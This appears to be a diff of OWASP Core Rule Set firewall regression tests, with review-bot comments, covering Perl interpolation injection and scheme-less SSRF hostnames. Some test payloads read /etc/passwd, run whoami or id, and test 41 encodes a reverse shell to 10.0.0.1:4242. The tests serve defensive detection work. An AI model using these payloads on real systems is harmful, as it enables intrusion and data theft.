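Review bot: Test 47's `uri: "/get?ssrf=http%3A[::ffff:a9fe:a9fe]"` leaves `[`, `]` and `:` raw in the query while every other new case in the `@@ -887,3 +887,147 @@` hunk percent-encodes its reserved characters; HTTP clients differ in whether they pass brackets through untouched or reject/normalize them, so the outcome can depend on the test runner rather than the rule. Encoding it as `http%3A%5B%3A%3Affff%3Aa9fe%3Aa9fe%5D` removes that dependence, and if the raw form is deliberately tested the desc should say so. Test 50's desc helpfully notes that `123456789` decodes to the public address 7.91.205.21; adding that the rule is expected to flag the dotless-decimal encoding itself rather than the target range would make the positive expectation less surprising (that reading is inferred from the `expect_ids`, the rule is not on this page).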
@@ -14,8 +14,796 @@ tests: User-Agent: "OWASP CRS test agent" method: GET port: 80 - uri: "/get?x=@{[system+whoami]}" + uri: "/get?x=%40%7B%5Bsystem%20%27whoami%27%5D%7D" version: HTTP/1.1 output: log: expect_ids: [934140] + - test_id: 2 + desc: "Perl interpolation attack: @{[getpwuid($>)]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bgetpwuid%28%24%3E%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 3 + desc: "Perl interpolation attack: @{[rand 100]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Brand%20100%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 4 + desc: "Perl interpolation attack: @{[$$]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%24%24%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 5 + desc: "Perl interpolation attack: @{[keys %ENV]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bkeys%20%25ENV%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 6 + desc: "Perl interpolation attack: @{[crypt($passwd, 'xx')]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bcrypt%28%24passwd%2C%20%27xx%27%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 7 + desc: "Perl interpolation attack: @{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5BCORE%3A%3Atime%28%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 8 + desc: "Perl interpolation attack: @{[uc 'hello']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Buc%20%27hello%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 9 + desc: "Perl interpolation attack: @{[sort { $a <=> $b } (3,2,1)]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsort%20%7B%20%24a%20%3C%3D%3E%20%24b%20%7D%20%283%2C2%2C1%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 10 + desc: "Perl interpolation attack: @{ [ uc 'hello' ] }" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%20%20%20%5B%20%20%20uc%20%20%20%27hello%27%20%20%20%5D%20%20%20%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 11 + desc: "Perl interpolation (parens before call): @{[ (system 'id') ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%28system%20%27id%27%29%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 12 + desc: "Perl interpolation (ampersand call): @{[ &system 'id' ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%26system%20%27id%27%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + 
- test_id: 13 + desc: "Perl interpolation (double negation unary): @{[ !!system 'id' ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%21%21system%20%27id%27%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 14 + desc: "Perl interpolation (CORE namespace): @{[ CORE::system 'id' ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20CORE%3A%3Asystem%20%27id%27%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 15 + desc: "Perl interpolation (do{} block): @{[ do { system 'id' } ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20do%20%7B%20system%20%27id%27%20%7D%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 16 + desc: "Perl interpolation (qq{} string arg): @{[ system qq{whoami} ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20system%20qq%7Bwhoami%7D%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 17 + desc: "Perl interpolation (string concatenation arg): @{[ system ('who'.'ami') ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20system%20%28%27who%27.%27ami%27%29%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 18 + desc: "Perl interpolation (whitespace & tabs): @{[\tsystem\t'id'\t]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + 
Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%09system%09%27id%27%09%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 19 + desc: "Perl interpolation (newline before ]): @{[ system 'id' # cmt \\n ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27id%27%20%23cmt%0A%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 20 + desc: "Perl interpolation (ampersand + namespace, no args): @{[ &CORE::time ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%26CORE%3A%3Atime%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 21 + desc: "Perl interpolation (extra spaces everywhere): @{ [ system \"id\" ] }" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%20%20%20%20%5B%20%20%20%20system%20%20%20%20%22id%22%20%20%20%20%5D%20%20%20%20%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 22 + desc: "Perl interpolation attack (double @ valid): @@{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%40%7B%5BCORE%3A%3Atime%28%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 23 + desc: "Perl interpolation attack (quad @ attempt; likely error but malicious intent): @@@@{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?x=%40%40%40%40%7B%5BCORE%3A%3Atime%28%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 24 + desc: "Perl interpolation (evasion: missing closing brace): @{[system 'id']" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27id%27%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 25 + desc: "Perl interpolation (evasion: missing closing brace with extra text): @{[system 'id']extra" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27id%27%5Dextra" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 26 + desc: "Perl interpolation (evasion: multiple bracket pairs): @{[test][test2]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Btest%5D%5Btest2%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 27 + desc: "Perl interpolation (backslash in command): @{[system 'who\\ami']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27who%5Cami%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 28 + desc: "Perl interpolation (empty quotes in command): @{[system 'whoam''''i']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27whoam%27%27%27%27i%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 29 + desc: "Perl interpolation in POST body: @{[system 
'id']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: POST + port: 80 + uri: "/post" + data: "param=%40%7B%5Bsystem%20%27id%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 30 + desc: "Perl interpolation in cookie value: @{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "session=@{[CORE::time()]}" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 31 + desc: "Perl interpolation in cookie name: @{[system 'id']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "@{[system 'id']}=value" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 32 + desc: "Perl interpolation in argument name: @{[getpwuid($>)]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?%40%7B%5Bgetpwuid%28%24%3E%29%5D%7D=value" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 33 + desc: "Perl interpolation (vertical tab whitespace): @{[\\vsystem\\v'id'\\v]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%0Bsystem%0B%27id%27%0B%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 34 + desc: "Perl interpolation (exec instead of system): @{[exec 'whoami']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?x=%40%7B%5Bexec%20%27whoami%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 35 + desc: "Perl interpolation (backticks): @{[`whoami`]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%60whoami%60%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 36 + desc: "Perl interpolation (qx{} command): @{[qx{whoami}]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bqx%7Bwhoami%7D%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 37 + desc: "Perl interpolation (eval block): @{[eval{system 'id'}]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Beval%7Bsystem%20%27id%27%7D%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 38 + desc: "Perl interpolation (open pipe): @{[open F,'|ls']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bopen%20F%2C%27%7Cls%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 39 + desc: "Perl interpolation (require statement): @{[require File::Find]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Brequire%20File%3A%3AFind%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 40 + desc: "Perl interpolation (long payload): @{[system 'cat /etc/passwd | grep root | cut -d: -f1']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27cat%20%2Fetc%2Fpasswd%20%7C%20grep%20root%20%7C%20cut%20-d%3A%20-f1%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 41 + desc: "Perl interpolation (reverse shell): @{[system 'bash -c bash -i >& /dev/tcp/10.0.0.1/4242 0>&1']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27bash%20-c%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.0.1%2F4242%200%3E%261%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 42 + desc: "Perl interpolation (file read): @{[open F,'/etc/passwd';@a=]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bopen%20F%2C%27%2Fetc%2Fpasswd%27%3B%40a%3D%3CF%3E%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 43 + desc: "Perl interpolation (mixed case @): @{[System 'ID']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5BSystem%20%27ID%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 44 + desc: "Negative test: JSON array (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%7B%22array%22%3A%5B1%2C2%2C3%5D%7D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 45 + desc: "Negative test: CSS attribute selector (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + 
port: 80 + uri: "/get?css=div%5Bdata-value%3D%22test%22%5D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 46 + desc: "Negative test: Email address with @ (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?email=user%40example.com" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 47 + desc: "Negative test: Python dict syntax (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?data=%7B%27key%27%3A%5B%27value1%27%2C%27value2%27%5D%7D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 48 + desc: "Negative test: JavaScript array (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arr=%5B%22a%22%2C%22b%22%2C%22c%22%5D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 49 + desc: "Negative test: Markdown link syntax (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=%5Blink%5D%28https%3A%2F%2Fexample.com%29" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 50 + desc: "Negative test: Hash with array value (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?perl=%24hash%7Bkey%7D%3D%5B1%2C2%2C3%5D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] 
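Review bot: The desc of test 18 writes `\t` inside a double-quoted YAML scalar, so the description string carries real tab characters, whereas test 33 writes `\\v` to keep the escape literal; the two tests describe the same kind of whitespace evasion in different ways, and a raw tab in a desc is easily mangled in test reports. `desc: "Perl interpolation (whitespace & tabs): @{[\\tsystem\\t'id'\\t]}"` keeps it consistent with test 33. Two smaller desc/payload mismatches: test 43 is labelled "mixed case @" although the case change is in `System 'ID'`, not in the sigil, and test 42's desc ends in `@a=]}` while its URI encodes `@a=<F>`; if the latter is not an artefact of how this page was rendered, the desc should read `@{[open F,'/etc/passwd';@a=<F>]}` so that it still matches the payload sent. The `tests:` sequence these entries extend begins above this hunk.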
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934190.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934190.yaml new file mode 100644 index 0000000000..056c461973 --- /dev/null +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934190.yaml 
@@ -0,0 +1,329 @@ +--- +meta: + author: "fzipitria" + description: "Test for SSRF scheme-less hostname detection in PL1" +rule_id: 934190 +tests: + - test_id: 1 + desc: SSRF - scheme-less localhost + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 2 + desc: SSRF - scheme-less localhost.localdomain + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost.localdomain/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 3 + desc: SSRF - scheme-less localhost4 + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost4/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 4 + desc: SSRF - scheme-less localhost4.localdomain4 + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost4.localdomain4/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 5 + desc: SSRF - scheme-less ipv6-localhost + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=ipv6-localhost/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 6 + desc: SSRF - scheme-less ip6-loopback + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=ip6-loopback/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 7 + desc: SSRF - scheme-less host.docker.internal (Docker) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=host.docker.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 8 + desc: SSRF - scheme-less gateway.docker.internal (Docker) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=gateway.docker.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 9 + desc: SSRF - scheme-less kubernetes.docker.internal (Docker Desktop) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=kubernetes.docker.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 10 + desc: SSRF - scheme-less host.containers.internal 
(Podman) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=host.containers.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 11 + desc: SSRF - scheme-less kubernetes.default.svc.cluster.local (K8s) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=kubernetes.default.svc.cluster.local/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 12 + desc: SSRF - scheme-less LOCALHOST (Windows case) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=LOCALHOST/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 13 + desc: SSRF - scheme-less localtest.me (testing service) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localtest.me/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 14 + desc: SSRF - scheme-less lvh.me (testing service) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: 
"/get/test?url=lvh.me/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 15 + desc: SSRF - scheme-less localhost in POST body + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post/test" + data: "url=localhost%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 16 + desc: SSRF - scheme-less host.docker.internal in cookie + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "redirect=host.docker.internal/" + method: GET + uri: "/get/test" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 17 + desc: SSRF - localhost with scheme (overlaps with 934110) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=http%3A%2F%2Flocalhost%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110, 934190] + - test_id: 18 + desc: SSRF - negative test - legitimate domain + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=example.com/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934190] + - test_id: 19 + desc: SSRF - negative test - word containing localhost + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?server=mylocalhost" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934190] + - test_id: 20 + desc: SSRF - negative test - localhost without trailing slash + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?server=localhost" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934190] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml index 0fa0750f82..392115998e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml @@ -1,6 +1,6 @@ --- meta: - author: "csanders-git, azurit" + author: "csanders-git, azurit, touchweb_vincent" rule_id: 941110 tests: - test_id: 1 @@ -173,3 +173,37 @@ tests: output: log: no_expect_ids: [941110] + - test_id: 11 + desc: XSS in Custom HTTP header + stages: + - input: + dest_addr: 